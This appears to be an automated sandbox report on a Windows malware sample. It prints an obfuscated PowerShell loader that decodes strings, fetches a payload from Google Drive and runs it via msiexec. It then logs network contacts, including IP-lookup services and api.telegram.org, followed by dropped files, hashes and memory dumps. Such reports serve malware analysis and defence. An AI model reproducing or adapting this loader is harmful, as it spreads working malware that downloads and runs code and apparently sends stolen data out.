YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') ;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.195:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 checkip.dyndns.org udp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 0.130.122.193.in-addr.arpa udp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/5076-0-0x00007FFD40AA3000-0x00007FFD40AA5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdg1qak5.the.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5076-10-0x00000242CDF70000-0x00000242CDF92000-memory.dmp

memory/5076-11-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

memory/5076-12-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

memory/5076-15-0x00007FFD40AA3000-0x00007FFD40AA5000-memory.dmp

memory/5076-16-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

memory/5076-19-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

memory/4308-20-0x00000000048F0000-0x0000000004926000-memory.dmp

memory/4308-21-0x0000000004FE0000-0x0000000005608000-memory.dmp

memory/4308-22-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

memory/4308-23-0x0000000005680000-0x00000000056E6000-memory.dmp

memory/4308-24-0x0000000005760000-0x00000000057C6000-memory.dmp

memory/4308-34-0x0000000005810000-0x0000000005B64000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 44a071b5b03cdad0f233428b60507ab2
SHA1 fb2a6cb8abb0cccd428614e39cc9eb4c983cfb87
SHA256 b75bf24e17edc409cb664bd10198b4fef5f5166d510e13f9370efaafd9c8a6e4
SHA512 ffde66357926f5345190fe6f97f25bc5a4d8c6db6b62ff3f261f68b02cda396d6e8101d3f18b4fda53223652b0bbfda1577711379573c6f58cdf96110257c851

memory/4308-36-0x0000000005E80000-0x0000000005E9E000-memory.dmp

memory/4308-37-0x0000000005EA0000-0x0000000005EEC000-memory.dmp

memory/4308-38-0x0000000007680000-0x0000000007CFA000-memory.dmp

memory/4308-39-0x0000000006400000-0x000000000641A000-memory.dmp

memory/4308-41-0x0000000007080000-0x00000000070A2000-memory.dmp

memory/4308-40-0x00000000070E0000-0x0000000007176000-memory.dmp

C:\Users\Admin\AppData\Roaming\Kondemnations.Stu

MD5 d3eaa25322d53ddaef4b33d72552badf
SHA1 4d703e333fce51d3849a1467268437b89d0cf239
SHA256 d35582b6c56ab0068075a1a5e338cd0d24c381673cf959eca45e516fedf471f3
SHA512 60aa35eb0d284caab596550fe1218af035c4ba38e29196436c0f3e09f89b87d51a7bdf680995f260ab08e6b44d9e4f564cc589c3c63cbfb98598ace3ea5becd1

memory/4308-42-0x00000000082B0000-0x0000000008854000-memory.dmp

memory/4308-44-0x0000000008860000-0x000000000C1B6000-memory.dmp

memory/2012-57-0x0000000000C00000-0x0000000001E54000-memory.dmp

memory/2012-58-0x0000000000C00000-0x0000000000C48000-memory.dmp

memory/2012-59-0x0000000023890000-0x000000002392C000-memory.dmp

memory/2012-61-0x00000000243F0000-0x00000000245B2000-memory.dmp

memory/2012-62-0x0000000023B50000-0x0000000023BA0000-memory.dmp

memory/2012-64-0x0000000023C80000-0x0000000023D12000-memory.dmp

memory/2012-65-0x0000000023C30000-0x0000000023C3A000-memory.dmp